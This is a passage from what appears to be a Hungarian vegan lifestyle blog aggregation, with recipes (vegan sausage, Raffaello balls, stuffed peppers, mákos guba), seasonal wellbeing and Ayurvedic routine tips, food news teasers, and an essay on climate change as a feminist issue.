esetleg babérlevelet. Persze kuktában is főzhetjük a babot. Kevesebb vízzel gyorsabban készül el. Ha konzerves babbal dolgozunk, akkor leszűrjük, átmossuk és felhasználjuk ahogy a továbbiakban írom. A vadrizst átmossuk és bő vízben puhára főzzük. Ugyanezt elvégezzük a barna rizzsel is. A kétfajta rizst nem érdemes együtt, összekeverve főzni, mert eltérő főzési idejük van, a barna rizs valamivel előbb fő meg. Miután a rizsek megfőttek, összekeverjük a puhára főtt babbal. Ételízesítővel picit megszórjuk, apróra vágott foghagymát keverünk bele majd adhatunk hozzá 1 kanál sörélesztő pelyhet, végül a paprikákat megtöltjük. Töltés előtt a paprikákat megmossuk, szárukat, magházukat kivágjuk. A paprikákat félbe vágva megtöltjük. Sütőbe tesszük. Mikor már nagyjából megsültek (kb 20 perc után), pár szem paradicsomot teszünk a tetejére és vegán sajtot reszelhetünk rá. Ha az nincs, akkor füstölt tofu szeleteket is tehetünk a töltött paprikák tetejére.
Vegán kolbász gluténmentesen
Emberek tömegei vásárolnak vegetáriánus és vegán kolbászokat, majd sütik ki konyháikban. Egy egész iparág épült erre. Megvizsgálva összetevőiket gyakran szerepel közte a szója, meg emellett még sok más (olajok, szulfidok, élesztő, növényi festék, búzaliszt, ízfokozó, növekedésért felelős ammónium karbonát, stb), amit egy házi készítésű kolbász esetében elkerülhetünk. E szempontból Jolly Joker ez a recept, hiszen ha sok mennyiséget készítettünk belőle, nyugodtan lefagyaszthatjuk a kész kolbászokat, de hűtőben is eláll pár napig, így lehetőségünk van a változatos felhasználására, mint például rakott krumplihoz az egyik nap, lecsóhoz a másik nap, stb. Persze mustárral és sült krumplival vagy krumplipürével együtt is élvezhetjük ezt a kolbászt, sütőből frissen tálalva, ropogósan. Elkészíteni sem bonyolult és Magyarországon illetve Angliában is könnyen beszerezhatő a szójagranulátum és a barna rizs, ami a két fő összetevője. Ráadásul Magyarországon csak génmódosítás mentes szóját szabad forgalomba helyezni (legutóbbi ismereteim szerint), tehát ettől sem kell tartani. Zabliszttel segítettem összeállni könnyen formálhatóvá, de ha a zab nem elég gluténmentes számunkra, akkor kukoricaliszt vagy kukoricadara is felhasználható helyette. Előnye ennek a kolbásznak, hogy olajmentesen elkészíthető. Ha sütőpapíron sütjük, akkor végképp nélkülözzük a hevített zsiradékot. Persze, aki szeretné, hogy tucsogjon az olajban, mint a bolti félék, az süsse olajon. Egészségi szempontból azonban inkább ennek kerülését javaslom. A recept Hozzávalók: - 20 dkg szójagranulátom - 15 dkg barna rizs - 10 dkg zabpehely - 2 evőkanál ételízesítő - 1/2 fej fokhagyma vagy 1 ek fokhagyma granulátum - őrölt fekete bors - őrölt köménymag - fűszerpaprika - füstölt paprika - folyékony füstaroma (opcionális) - majoránna - szükség esetén só Elkészítés: A szójagranulátumot megszórom 1 ek ételízesítővel és felöntöm forró vízzel, majd hagyom benne állni legalább addig, amíg a barna rizs puhára fő. Miután megfőtt a rizs, a vizet szűrőn keresztül leöntöm a szójagranulátumról majd a rizzsel összekeverem. Teszek hozzá annyi zabpelyhet amennyit felvesz. Használhatunk zabpelyhet, de meg is őrölhetjük amolyan zablisztté és úgy is adhatjuk hozzá. A lényeg, hogy olyan masszát kapjunk, amit könnyen tudunk formálni a kezünkkel. Hozzákeverjük a fűszereket, jól átdolgozzuk a masszát, hogy a fűszerek jól elkeverődjenek. Nedves kézzel kis darabokat szakítunk le belőle majd kolbász formákat sodrunk. Sütőpapíros tepsin előmelegített sütőben 20-30 perc alatt készre sütjük. Kirpóbáltam, air fryer (forró levegő sütő)-ben is megsüthető, kisebb mennyiségnél (pár darab) érdemes azzal, de többnél jobban megéri sütőben sütni.
Raffaello golyók házilag
Alig másfél hónap és itt a karácsony! Tudod már mivel leped meg szeretteidet? Ha kedveled a saját készítésű ajándékokat, készíts raffaello golyókat. Ha azt keresed, milyen kiadós édesség kerüljün az ünnepi asztalra, akkor szintén azt ajánlom, készíts raffaello golyókat. Tömény kókuszos élvezet, közepén egy szem mandula. Vegán, gluténmentes, cukormentes (ha cukor helyett mással édseíted), nyers, paleo. Mi kell még? Én tudom, hogy valaki gyors megcsinálja és megehessük. :) A recept Hozzávalók: - 2 konzerv kókusztej - egy konzerv 400 g (Angliában Lidlben kapható, Magyarországon nagy Tescoban, Auchanban, ázsiai üzletekben) - 200 g kókusz krém (Creamed Coconut) (Angliában, Magyarországon nagy Tescoban, Auchanban, bioboltokban, DM-ben kaphato - 100 g őrölt mandula - édesítőszer pl nyírfacukor, kókuszvirág cukor, stevia, stb. ízlés szerint - mandula - kókuszreszelék Elkészítés: A két konzerv kókusztejet fagyasztóba tesszük kb. 45 percre. Ha már eleve volt otthon ilyen konzervünk, és a hűtőben tároltuk, az is jó. A lényeg, hogy a kókusztej felső, vastag rétege jól dermedt legyen ahhoz, hogy jól tudjuk kezelni. Amíg a fagyasztóban dermednek, a kókuszkrémet valamelyest olvasszuk meg annyira folyékonzra, hogy majd könnyen hozzá tudjuk adni a kókusztejek sűrűjéhez. A megdermedt (hűtőből vagy fagyasztóból kivett kókusztej konzerveket óvatosan nyissuk ki és a felső keményebb réteget kanalazzuk egy tálba, ahol habverő segítségével kezdjük el összedolgozni, folyamatosan adagolva hozzá a nem meleg, de folyósabb állagú kókuszkrémet. Ehhez adjuk hozzá az édesítőt és az őrölt mandulát. Ezt a masszát a hűtőbe kell visszatenni, dermedni hagyni. Amikor már annyira megdermedt, hogy golyók formázhatók belőle, v izes kézzel kis golyókat formázunk a megszilárdult masszából, miközben mandulát teszünk a közepébe, majd kókusz reszelékbe hempergetjük. Ha el nem fogy készítés közben :) akkor hűtőben pihentessük a tálalásig.
TOP 10 tipp - amivel esős, hideg napokon is kellemesen töltheted az időd
2020. október 21. Élj harmóniában
Amikor bejön a borongós, hideg időjárás sokan depisek lesznek, elmegy az életkedvük. Van olyan ismerősöm, aki az ágyból is alig akar kikelni. A jógás tanítványaim msotanában állandóan panaszkodtak hogy nincs kedvük semmit csinálni és nem is tudnak magukkal mit kezdeni. Sajnos vagy sem, ezen az éghajlaton minden évben szeptembertől beköszönt a hideg időjárás, amikor nem tudsz sok időt tölteni a szabadban, kevés a napsütéses órák száma és sok időt kell a lakásban bent lenned. Ez az időszakban a természetben is a visszavonulás ideje. Ezen lehet szomorkodni is, de nincs értelme:). Ezt az időszakot, nagyon sok dologgal kellemessé és hasznossá is teheted. Lásd benne a lehetőséget... ha ezt az időt okosan használod ki, akkor nagyon tudod akár élvezni is és még profitálhatsz is belőle. Most lehetőséged van többet lenni otthon, többet foglalkozni az önmagaddal, az egészségeddel az otthonoddal, az otthoni feladatiddal, a családoddal, a saját belső dolgaiddal, önfejlesztéssel. Ime néhány tipp, amivel igazán kellemesen és hasznos telhetnek a hideg őszi, téli napok:) 1. Selejtezés, rendrakás 2. Egészséges ételek készítése, sütés, főzés 3. Önfejlesztő, pozitív könyvek olvasása 4. Otthoni rendszeres testmozgás 5. Rokoni, baráti kapcsolatok ápolása 6. Relaxáció, feltöltődés, pihenés 7. Egészséges életmód kialakítása 8. Napfényes hangulatú filmek nézése 9. Befelé figyelés, meditáció 10. Nyári élmények képeinek közös nézése Tudatos előkészítés Én minden évben előre tudatosan készülök erre az időszakra. Mivel nyáron mi sokat járjuk a természetet, túrázunk, így nem igen érek rá itthon olvasni, előadásokat hallgatni. A nyár folyamán, amikor látok olyan könyvet ami érdekel már beszerzem azzal, hogy ezt majd ősszel, télen ráérek elolvasni. Letöltök olyan előadásokat - az én esetemben lelki témájú, jógafilozófiával vagy egészség megrőzéssel, kapcsolatos dolgokat. amit majd jó lesz meghallgatni. szeretem képezni magam és iyilenkor továbbképzéseken is szoktam részt venni. A kirádnulásokról sok képet készítünk, mert az egyik kedvenc téli időtöltésünk, végignézzük a nyári képeket - akár korábbi évek túraútvonalait is bejárjuk újra az emlékeink alapján:) recepteket is gyűjtögetek össze, amiket nyáron nem érek rá elkészíteni, vagy csak nincs kedvem a sütőt használni, de télen szuper jó program. Megannyi témám van, amit tervezek a blogra nektek kidolgozni, írni. Ezeket le szoktam írni és amikor ráérek ősszel, télen elkezdem nektek megírni bejegyzések formájában itt a blogon. Szóval én annak ellenére, hogy nem szeretem a hideget és ez az időjárás nagyon nem a kedvencem, mindig előre tudatosan készülök erre az időszakra és látom benne a lehetőséget:) Egészséges életmódAhogy a természetben is fontos az időzítés, úgy az ember életében is kiemelt szerepe van a megfelelő időzítésnek. Bizonyos időszakok egyes tevékenységek elvégzésére nagyon alkalmasak, más tevékenységek elvégzésére kevésbé alkalmasak. Amennyiben az életmódod kialakításnál figyelembe veszed a természet rendjét, azzal támogatod, hogy egyensúlyban legyél, erős legyen az immunrendszered és az energiáidat a lehető legjobban használd fel. Amikor nem a természetes ritmusod szerint élsz teljesen kimeríted a szervezeted és kibillensz az egyensúlyodból. Az évszaki menetrend megértéséhez fontos látni, hogy az ősz a természetben is a visszahúzódás ideje, Ezért érdemes kevesebbet tevékenységet több nyugalmat, befelé figyelést beiktatni. Néhány jó tanács egy ideális napirend kialakításához: - Legkésőbb 6-7 óráig kelj fel, lehetőleg ébresztő nélkül. Ehhez a elgegyszerűbb, ha nme használsz sötétítőt:) - Reggel jó ha elsőnek meglátogadot a mellékhelységet és utána jöhet a tisztálkodás. Hideg időjárásban hasznos ha zuhanyozás előtt vagy után egy jó kis meleg olajos önmasszázst is elvégzel. - A reggeli tisztálkodás után szánj egy kis időt a napindításra - jóga, meditáció, valamilyen könnyed testmozgás, a nap végiggondolása, hála, etc.. - A reggelit 08:00- ig legkésőbb fogyaszd el - 8 után reggelizni, elég hízókúrás megoldás:) A reggelinél ha nincs éhségérzeted, akkor ne egyél. - Az ebédet 12:00-14:00 óra között fogyaszd el, ilyenkor a legerősebb az emésztés és nyugodt körülméynek között, odafigyelve. Ez legyen a nap legtartalmasabb étkezése. - A vacsorát ha lehet 18:00 óráig fogyaszd el. - Vacsora után már csak kellemes pihentető tevékenységeket csinálj - kerüld a filmezést, netezést, munkát. Ez segíti lenyughatni az elmét és a testet, felkészít egy jó az alvásra. - Lehetőleg 22:00-ig feküdj le aludni, de mindenképpen éjfél előtt bújj ágyba. A téli időszakban jó ha korábban fekszel, mint nyáron. Az ájurvédikus napirendről további információkat itt olvashatsz: https://eljharmoniaban.blogspot.com/2016/03/osszhangban-termeszet-ritmusaval.html TestmozgásSajnos az őszi, téli időszak alatt lecsökken a szabadban végzett mozgás is, ezért fontos, hogy rendszeresen, az egészségedet megőrző, a sok ülést kompenzáló megfelelő testmozgást végezz a hideg hónapokban. Amikor csak szép az idő és teheted, menj ki sétálni. Amikor látható nap és kék ég, mindig szánj időt arra, hogy nézd a kék eget:) A mozgás hatással van az izomzatodra, hormonrendszeredre, csontsűrűségedre, közérzetedre, testsúlyodra, emésztésedre, keringésedre, légzésedre. A mozgás hiánya részben belső feszültséget eredményezhet, ráadásul sajnos az izomtömeg vesztésével, csontritkulás erősödésével is együtt járhat. Lehetőleg ne feküdj vagy ne ülj egész nap a számítógép és a tv előtt:) ha nem vagy elég tudatos, akkor a tél végére néhány kilóval fogsz gyarapodni és feszültebb is leszel, esetleg depisebb. Tudatosan kezdj el otthon mozogni, jógázni, A jóga kedvező hatásairól itt olvashatsz. tornázni és a mindennapi tevékenységeknél tudatosan fokozd a testmozgást. Pl teregetésnél egyenként hajolj le a ruhakosárba a dolgokért, akár többször menj el a spejzig és vissza főzés közben, lift helyett lépcsőzz, akár több emeletet is tegyél meg oda vissza, mint amit amúgy szoktál. Használj ki minden lehetőséget a testmozgásra, de ne vidd túlzásba. Most már nagyon klassz online otthoni mozgásos lehetőségek vannak. Az online jógaórámra is látom, hogy ősszel többen járnak most, mint nyáron. Sütés, főzés Nyáron ritkán kapcsolom be a sütőt, de télen végre van időm sütőgetni, főzőcskézni, új receptekkel kísérletezni, régi bevált recepteket elkészíteni. Sok sütőben sült dolgot készítek ilyenkor, rakott dolgokat, sült zöldségeket, pékárúkat, kekszeket, süteményeket, mindenféle finomságot:) Az őszi, téli időszakban annak érdekében, hogy egészséges maradj célszerű egészséges, tápláló, meleg szaftos ételeket, melegítő fűszerekkel fűszerezve fogyasztani. ősszel, télien fogyassz sok meleg ételt és meleg folyadékot - kerüld a nyers és hideg dolgokat. Az őszi táplálkozáshoz részletes leírást itt találsz: http://eljharmoniaban.blogspot.com/2015/10/taplalkozas-az-oszi-idoszakra-tanacsok.html Itt a blogon nagyon sok egészséges receptet is fent van . Programok Lévén nem kedvelem a hideget, nekem a téli sportok a termálfürdő és a szauna:) A barátokkal akikkel nyáron lehetett kirándulni, sétálni, ilyenkor jó dolog közösen elmenni gyógyfürdőzni. Decemberben, amikor már nagyon kevés napfényben van, meg szoktam nézni néhány filmet... utólag jöttem rá, csupa olyan filmet választok - szinte minden évben ugyanazokat - amiben csodaszép kék ég van, sok napsütés és esetleg még szép tájak is.:) Az őszi, téli időszakban a férjemmel mi sokat járunk színházba, de ez a maszkos színház kicsit visszatart idén. Már néztem néhány előadás online is megnézhető. Nekünk az Örkény Színház nagy kedvencünk, a tél folyamán biztosan benevezünk néhány jó kis előadásra. Vannak olyan darabok, amiket szinte minden évben megnézünk. Rendrakás, selejtezés A sok otthon töltött idő jó lehetőség arra, is, hogy nekikezdj selejtezni, rendet rakni. Szabadulj meg minden olyan dologtól, amire igazából nincs is szükséged. Az életben minden áramlik, amikor ez az áramlás megreked dugulás keletkezik, blokkolttá válik az energia áramlása, ami problémákhoz vezet. A felhalmozás az életedben is energetikai blokkot képez, ezért soha ne halmozz fel. Engedd áramolni a dolgokat... ahhoz, hogy egy új ruhadarab beférjen a szekrényedbe, helyet kell neki csinálni... nem ideális az egész lakást egy idő után teletenni szekrényekkel:) Itt a lehetőség, hogy elkezdj minden egyes darabot ami van az otthonodban a kezedbe venni és tudatosítsd van-e rá szükséged, használtad-e az elmúlt 3 évben. (ruhaneműk, cipők, táskák, dísztárgyak, jegyzetek, papírok, könyvek, cd-k, dvd-k, fűszerek, konyhai alapanyagok, elektronikai cikkek, gyógyászati dolgok, kozmetikai termékek) Amikor egy egy darabon gondolkodsz érdemes azt is megfigyelni, hogy milyen érzéseket vált ki belőled... ha egy tárgy vagy ruhadarab vagy bármi rossz érzéseket vált ki, akkor nem érdemes megtartani. Ne tartsd meg a sok sok régi dolgot azzal, hogy majd jó lesz valamire... amire évekig nem volt szükséged valószínű nem is lesz, de lehet valaki más pedig jó hasznát vehetné. A selejtezés végén nézd át mi került marad kupacba és mi a kiselejtezendő kupacba - így átláthatod miből mennyi van és maradt-e elegendő holmid, nehogy kidobj valamit ami utána hiányozni fog:) Ha így selejtezel és semmit nem hagysz ki ( ez akár napokat, heteket, de ha nagy felhalmozó vagy hónapokat is igénybe vehet) , rend lesz az otthonodban és benned is, minden kényelmesen el fog férni, átlátható amid van, jól fogod magad otthon érezni, csupa olyan dolog vesz majd körül ami neked jó érzéseket okoz:) Önfejlesztés, befelé figyelés, meditációEz a legjobb része ennek az időszaknak. Ahogy a természet is visszahúzódik, ilyenkor Te is több időt tudsz szánni magadra, a belső dolgaidra. Érdemes lelki dolgokkal is foglalkozni - spirtuális könyveket olvasni, spirituális előadásokat hallgatni. A Bhagavad Gíta és Srimad Bhagavatam a két legkíválóbb írás, ami segít teljes körűbb tudásra szert tenni arról, ki vagyok én, mi ez a világ körülöttem, mi az élet célja, hogyan működik a világ, ki a Legfelsőbb (Isten), mi a kapcsolatom a Legfelsőbbel. Életem legjobb döntése az volt, amikor elindultam a lelki önmegvalósítás útján. Naponta adok hálát a sorsank azokért a csodákért, amit a lelki dolgokból merítek. Niranjana Swami és Bhaktividya Purna Swami a két kedvenc gurum, akiktől nagyon sok tanítást hallgatok. Vannak olyan leckék is ami nyilvánosan is elérhető, ha rákeresek interneten. Akit esetleg érdekel egy leckét be is linkelek, amihez van magyar fordítás. https://www.youtube.com/watch?v=wh_4qMIw2zc Aki tud angolul, nekik könnyen szétválaszth ató, de Magyarországon úgy látom mindig kevredik az ezoterikus és a spirituális kifejezés. Spirituális minden, ami a lélekkel, az igazi önvalóval foglalkozik. pl. a jóga (ahol nem csak tornáznak, de foglalkoznak az önmegvalósítással is), a keresztény vallás egyéb vallások mind, mind spirituális utak. Azok a dolgok amik nem a lélek fejlődésével foglalkoznak csak valamiféle finom energetikával, aura látás, angyalok, etc. nem spirituális dolgok, hanem ezoterikusak. A belső munka egyik lényegi része a meditáció. Ilyenkor közelebb tudsz kerülni önmagadhoz, belső békét, nyugalmat tapasztalsz, tisztábban látod a dolgokat, könnyebben észreveszel összefüggéseket, felismerésekre tehetsz szert. A férjem meditációt oktat és látjuk, nem egyszerű a mai rohanó életforma mellett elkezdeni meditálni, de hidd el, ez a legjobb dolog ami veled történhet:) Kapcsolatok Az őszi téli időszak ideális arra is többet tartsd a kapcsolatot rokonokkal, barátokkal, tudtok találkozni, akár együtt sütni, főzni vagy csak telefonon, interneten beszélhettek egymással. Ilyenkor van időd arra is, hogy rendet rakj ne csak a szekrényeidben, de az emberi kapcsolataidban is. Vizsgáld felül az emberi kapcsolataidat. A belső munka fontos része, hogy megszabadulj mindattól amire már nincs szükséged, nem járul hozzá a testi-lelki jóllétedhez, egészségedhez, boldogságodhoz. Gondold át mely kapcsolataid, milyen hatással vannak Rád, milyen hatással vannak az életedre. A személyiségedet, gondolkodásodat leginkább a szokásaid határozzák meg. A szokásaidat pedig leginkább a társulás befolyásolja - kivel beszélgetsz, kinek az írásait olvasod, kivel találkozol, milyen filmet nézel, etc... Szoktam mondani mond meg ki a példaképed és ki az az 5 ember akivel a legtöbb időt töltöd és megmondom milyen az életed....:))) Figyeld meg kik azok az emberek akik inspirálnak, pozitív energiákkal töltenek fel és kik azok akik lehúznak, rossz érzéseket generálnak benned. A mérgező, negatív emberek társaságát, negatív emberi kapcsolatokat tudatosan próbáld elkerülni, minimalizálni az életedben. Relaxáció Szánj minden nap időt tudatosan a feltöltődésre, sejt szintű relaxációra. Az idegrendszered és a pihenés kapcsolatáról ezen a linken olvashatsz részletesen. Használd ki a lehető legjobban ezt az őszi, téli időszakot:) Te is vonulj vissza kicsit, ahogy a természet. Törődj többet önmagaddal, otthonoddal, környezeteddel, emberi kapcsolataiddal. Élvezd a lehetőségét annak, hogy többet tudsz befelé figyelni... meditálj, imádkozz minden nap. Az Élj harmóniában - megújulás, egészség, életmód csoportomban folyamatosan teszek ki bejegyzéseket az egészséges életmód, egészséges táplálozásra vonatkozóan. Ha szeretnél csatlakozni itt tudsz: https://www.facebook.com/groups/189231931805348/ csodás őszi, téli napokat kívánok:) szeretettel: Kati
Nincs magyar nyár lecsó nélkül!
2020. augusztus 17. Vegavarázs
Nincs magyar nyár lecsó nélkül! Ha rajtam múlna, hungarikum lenne. Igen, tudom, hogy vannak más konyhában is változatai, de ez a magyar egyszerűen tökéletes! Gondoltam, leírom ebben a bejegyzésben, én hogy készítem, és arra is adok néhány tippet, mivel lehet gazdagítani. Lecsó 2 személyre: 5 db...
Zöldborsó angolosan
Míg angol iskolákban dolgoztam, gyakran láttam, hogy az önkormányzat által juttatott napi zöldség vagy gyümölcs adagban nem csak banán, mandarin, alma, répa, paradicsom jár az alsós gyerekeknek, hanem zöldborsó héjában. Zsengén vagy akár jól éretten adták a gyerekeknek (mosatlanul), ahogy érkezett, zacskókban. Kevés gyerek ette, ami érthető, hiszen elmarad az íze a banánétól. Küllemre sem volt mindig vonzó. Amikor a borsóhüvelyekben szépen kifejlett borsószemek voltak, megmutattam néhány gyereknek, hogy Magyarországon gyerekkoromban a kertben hogyan nyitottam ki és ettem meg belőle a borsószemeket. Nevettek rajta. :) Tiszta újdonság volt számukra. A különböző élelmiszer üzletekben is árulnak itt Angliában hüvelyes zöldborsót, kisebb csomagokban. Eleinte erre igen csak rácsodálkoztam, mígnem végre láttam valahol, hogy igen, az angolok a zsenge zöldborsót hüvelyesen eszik. Amikor a szemek még alig láthatóak benne, akkor akár nyersen, akár ételekbe főzve használják fel. Én is így tettem. Férjem vett kb. fél kilóval a helyi "piac"-on. Az egyik belvárosi téren heti háromszor árulnak zöldséget gyümölcsöt, ha sikerül eljutnunk, akkor ott szerezzük be a zöldség gyümölcs nagyobb részét. Egész jó dolgokat ki lehet fogni. Például bió sárgabarackot - amit az előző recepthez is használtam - 5 fontért adott kb. 4,5 kilót egy rekeszben. Cseresznyét is itt szerezzük be, télen pedig a narancsot, mandarint, almát, körtét. Gyakran van angol áruja, emellett spanyol, francia, néha dél-afrikai. Számunkra a spanyol gyümölcs nem olyan mint amikor magyaroknál vettük volna, hiszen úgymond Spanyoloszág a "szomszédban" van. Mindenesetre többnyire jó minőségű gyümölcsöket árul Sharon - ez a neve a vállalkozónak. Rekeszben, nagyobb tételben olcsóbb, aminek mi kiváltképpen örülünk. Így jutott férjem is olcsóbban a zsenge zöldborsóhoz, amit ehhez az ételhez használtam fel. A recept Hozzávalók: 1 fej hagyma 3-4 szál sárgarépa 1-2 szál fehér répa 2 maroknyi zsenge zöldborsó héjában 3-4 gerezd fokhagyma só vagy ételízesítő rizs vagy tészta köretnek Elkészítés: A hagymát miután megpucoltuk, megmostuk és felaprítottuk, egy kevés vizen üvegesre pároljuk. Hozzáaadjuk a megmosott, karikákra vágott répákat, az aljára teszünk egy kevés vizet, hogy ne égjen oda, adunk hozzá egy kevés ételízesítőt és tovább pároljuk. Amikor már nem túl kemény, hozzáadjuk a megmosott zöldborsót, rászorjuk a felaprított fokhagymát és fedő alatt megpároljuk. A legvégén adhatunk hozzá petrezselymet vagy akár pörköltösen (paprikát szórva a főzés közben a zöldségre) is elkészíthetjük. Fogyaszthatjuk tésztához vagy rizshez is. Mi az utóbbit választottuk. Könnyű kis étel a gyomornak is és gyorsan el lehet készíteni.
Mákos guba szilvalekvárral
A legtöbb ember vanília sodóval tálalja és fogyasztja a mákos gubát, pedig a szilvalekvár és a mák együtt is jól harmonizál. Angliában nem lehet kiflit kapni. Nem láttam még lengyel boltokban sem, ahol azért meg-megfordul magyar termék, mint túrórudi és társai. Persze, lehet hogy van valami magán (magyar) pék, aki süt, de nem jellemző. Olyannyira, hogy valaki jött hozzánk és megkérdezte, mit kérünk, férjemmel egyszerre mondtuk, kiflit. :) Pedig én is sütöttem már ropogós kiflit teljes kiőrlésű lisztből. Nem is arról van szó, hogy ne tudnék sütni. No de ahogy említettem, itt nincs kifli, viszont rátaláltam a helyi lidlben egy vegán jelzésű bagel csomagra, ami adta az ötletet. Ha a bagelt felkarikázom, akkor tulajdonképpen olyan, mint a kifli-karika. Így kezdődött a gubázás. :) Nyáron persze ritkábban készít az ember mákos gubát, na de ha az időjárás viharossá válik, amikor az ember csak begubózna, akkor igazán jól jön egy kis gubás finomság. A recept Hozzávalók: - 6-8 kifli (vagy bagel) felkarikázva, megszárítva - 1 liter növényi tej (zabtejet használtam most) - 5-6 ek mák - 3 ek erythritol - szilvalekvár Elkészítés: A mákot megdaráljuk (ha elektromos darálóval daráljuk, akkor érdemes hozzáadni egy kis erthritolt, ha kézi darálóval, akkor csak a darálás után). A bagel vagy kiflikarikákat felforralt, kissé megédesített tejben enyhén megáztatjuk, majd egy tálba tesszük. Rászórunk gazdagon a mákból, maj újabb sor megáztatott karikákat teszünk le. Szintén gazdagon megszórjuk az édes darált mákkal. Ezt addig folytatjuk, míg a kiflikarikák elfogynak. Vannak, akik szeretik kisütni, ez nem feltétlenül szükséges. Tálalásnál szilvalekvárot kanalazunk a tetejére.
Ajándékkönyv - Vegetáriánus kalandozások a magyar konyhában - teljes verzió
Azt mondják, minden rosszban van valami jó. A koronavírus terjedése kapcsán tapasztalt összefogás, az emberek segítő szándéka az utóbbi napokban nagyon megható számomra. Vannak, akik lakást adnak egészségügyi dolgozóknak, másik sétáltatni viszik idős emberek kutyáit, bevásárolnak, gyógyszertárba...
Gyümölcs és zöldségfogyasztás az EU-ban: aggasztó magyar adatok
Az EU-ban a magyarok eszik a legkevesebb zöldséget, de a gyümölcsfogyasztásban sem állunk túl jól. Holott mindkettő halálos betegségek megelőzéséhez járulhat hozzá.
Tejet találtak a vegán margarinban, figyelmeztet a Nébih
A Dániában gyártott termékből Magyarországra is érkezett.
A húsevés jövője megvetette lábát Magyarországon
Megjelent Budapesten Leonardo Dicaprio befektetése, a Beyond Meat álhúsos hamburgere, amitől még Németh Szilárd is összezavarodna. Megkóstoltuk.
Szeptember közepéig lesz magyar dinnye
A gyümölcstermelők sem mennek tönkre, az export is jó árról indul.
Évente fejenként 6 kilogramm zöldséget és gyümölcsöt dobnak ki a magyarok
Kampány indul a zöldség-gyümölcs pazarlása ellen.
A klímaváltozás feminista probléma (is)
A mai, átlag, magyar, heteroszexuális háztartásokban a fenntarthatóság irányába tett törekvések a nőkre hárulnak. A nők veszik észre a problémát (pl. az egyszer használatos nejlonzacskó, műanyag fülpiszkáló, papírzsepi és zacskója környezetszennyező, a gyerek ruhái káros anyagot tartalmazhatnak, a húsos táplálkozás nem fenntartható stb.), a nők keresnek rá megoldást, ők kutatják fel a leggazdaságosabb termékeket hozzá, keresnek és rendelnek vagy varrnak (!) textilzacskókat a bevásárláshoz, szörpöt készítenek bolti üdítő helyett, megtanulnak húsmentesen vagy vegánul főzni, és utána napról napra, hétről hétre el is készítik a növényi ételeket, utánaolvasnak a megfelelő tápanyagbevitelnek, csökkentik az élelmiszerpazarlást, keresnek megoldást a szelektív hulladék tárolásának, összeszervezik a napot, hogy minél kevesebb benzinnel, minél gyorsabban el legyen minden intézve stb. Háztartás és gyereknevelés Alapból a nők azok, akik mindent észben tartanak, mi fog lejárni a hűtőben, mit kell vásárolni, kinek-mikor-hová kell mennie, időpontok, szülinapok, a gyerekkel kapcsolatban kb. mindent... És ehhez még új teher a fenntarthatóság nyomasztó igénye: a legtöbb vegán ember nő, a legtöbb fenntarthatósággal foglalkozó blogger nő, nőkhöz szólnak a posztok, kivéve, ha drága termékekről, pl. napelemekről vagy elektromos autókról van szó. De ezek a nagyobb beruházást igénylő, fenntartható (vagy annak mondott) árucukkek és megoldások még egy dologban hátráltatják a pozitív változást: amíg a megszerzésükről ábrándozik a férfi, addig nem kell tennie semmit. Izgalmas ábrándozni róla, hogy a jövőben meglesz az új autó, vagy az ökoház napelemekkel, még akkor is, ha valójában nem tesz lépéseket annak megszerzéséért. A fenntartható életmód viszont nem mindig menő, izgalmas vagy kényelmes. Legtöbbször pont az ellenkezője, főleg, ha szokásaink tudatos, mindennapi megváltoztatásáról van szó. Arról nem is beszélve, hogy a hagyományos elvű, hetero háztartásokban a férfi termeli a GDP-t, és a magyar nők átlagban még mindig 20%-kal kevesebb fizetést kapnak, mint a férfiak ugyanazokban a beosztásokban. Tehát hiába is ábrándoznának a legújabb, vegán Tesla modellről, reálisabb, hogy többet járjanak tömegközlekedéssel. Ott vannak még a környezetbarát tisztítószerek, amiknek az árai nagyon széles skálán mozognak, és rosszabb esetben a partner meg sem érti, miért kellene a drágábbat megvenni, esetleg még morog is érte. De vannak olcsóbb, de sokkal kevésbé kényelmes/gyors megoldások, amikkel szintén a nőknek van több dolga. Lehet ecettel és szódabikarbónával takarítani, de az közel sem olyan gyors megoldás, mintha csak ráfújja az ember a mérgező, agresszív tisztítószert, és már törölheti is le egyben a vízkövet, a penészt, a zsiradékot és szappanlerakódást. Az átlag férfi megvan a jól megszokott rutinjában, még ha érdekli is valamilyen szinten a klímaváltozás, legyint egyet, hogy majd a világ megoldja. Mintha gyengeség lenne arra törekedni, hogy jobb emberek legyünk, kevesebb káros hatással legyünk a környezetünkre és a bolygóra. És mivel a férfiak kevésbé fogékonyak az önfejlesztésre, nem hiszi, hogy egy ember törekvése is számít, így minimalizálja a saját jelentőségét a problémában/megoldásban. Így a nő az, aki noszogatja a partnerét, mert ő viszont nem akarja kockáztatni a saját és gyermeke jövőjét. Ami miatt a nők gyakran megkapják, hogy mindig “baszogatják” a partnerüket. Shaming Most már állandósult az ún. shaming (szégyenérzet-keltés) a vegán és környezetbarát csoportokban, ha valaki valamit még nem tökéletesen csinál. Ez amortizálja az emberek lelki világát, hiszen bármennyire próbálkozik, sosem fog tökéletesen környezetbarát módon élni. Ez a teher is inkább a nők lelkét nyomja, pedig már alapból túl vannak terhelve. Nemcsak háztartás-felelős, gyereknevelési és fenntarthatósági-manager, főszakács és mindenki lelki támogatója, hanem még egy szar ember is, amiért megveszi a bolti (vegán) jégkrémet, és néha jól meri érezni magát. Mindig, mindent csomagolásmentesen, kimérve kéne megvásárolni az utolsó alapanyagig, természetesen csak hazai termékekből, és otthon elkészíteni házilag, akkor is, ha 6x annyi ideig tart, mert különben ő az oka az egész klímaváltozásnak hirtelen. Kozmetikumok A nők felé sokkal nagyobb elvárásokat támaszt a társadalom, ami az “ápoltságot” és “szépséget” illeti. A kapitalizmus hamar ráérzett arra, hogy ha az emberek (és főleg a nők) rosszul érzik magukat a bőrükben, sokkal több dolgot el lehet nekik adni. A női borotválkozás például ma azért létezik egyáltalán, mert egy borotva cég kitalálta, hogy a nőknek is el kéne adniuk a terméküket. 1915-ben elkezdték hirdetésekben azt állítani, hogy egy nő akkor igazán igényes, ha borotválkozik. Mivel a nők nem úgy néznek ki, mint a modellek a szétretusált képeken (még a modellek sem úgy néznek ki, mint a szétretusált képeken), ezért minden porcikájukra kitaláltak már valamilyen krémet, szérumot, akármit, amitől feszesebbek, vékonyabbak, vastagabbak, sötétebbek, világosabbak lesznek az adott testrészek. Ezek káros anyagokat juttatnak a környezetbe, csomagolásuk általában műanyag, gyártásuk energiába és károsanyag-kibocsájtásba kerül, röviden nem környezetbarát. De már olyan sikeres a folyamatos média-üzenet, hogy alig van olyan nő, aki ne próbálna folyamatosan valamit változtatni a külsején. Viszont ez a 22-es csapdája: ha sminkeled magad (vagy sok kozmetikumot használsz), megszólnak, ha nem sminkeled magad 